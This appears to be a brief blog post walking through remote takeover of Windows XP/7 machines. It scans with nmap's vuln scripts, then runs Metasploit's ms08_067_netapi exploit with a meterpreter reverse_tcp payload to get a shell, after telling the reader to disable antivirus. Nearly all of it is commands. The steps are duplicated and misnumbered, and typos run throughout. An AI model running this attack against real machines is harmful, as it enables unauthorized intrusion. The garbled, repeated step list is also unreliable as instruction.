Access Windows Xp/Windows 7
Step 1 - Turn off Your antivirus.
Step 2 - go To Command Prompt Type "ipconfig"
To See Interface and Ipaddress
Step 3 - nmap --script=vuln <ip Address >
thwere will be 2 vulnerability
1st | smb-vuln-ms08-067:
2nd | smb-vuln-ms17-010:
Step 4 - Open new tab
and Type
root@kali:~# service postgresql start
Step 5 - Open metasploit Using command msfconsole
Step 5 - Search = Using "search net api"
Step 8-
msf exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
Step 1 - Turn off Your antivirus.
Step 2 - go To Command Prompt Type "ipconfig"
To See Interface and Ipaddress
Step 3 - nmap --script=vuln <ip Address >
thwere will be 2 vulnerability
1st | smb-vuln-ms08-067:
2nd | smb-vuln-ms17-010:
Step 4 - Open new tab
and Type
root@kali:~# service postgresql start
Step 5 - Open metasploit Using command msfconsole
Step 5 - Search = Using "search net api"
Step 7-
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
Type exploit for exploit vulnerability
Step 10 - Type Shell To entar Microsoft shell
Comments
Post a Comment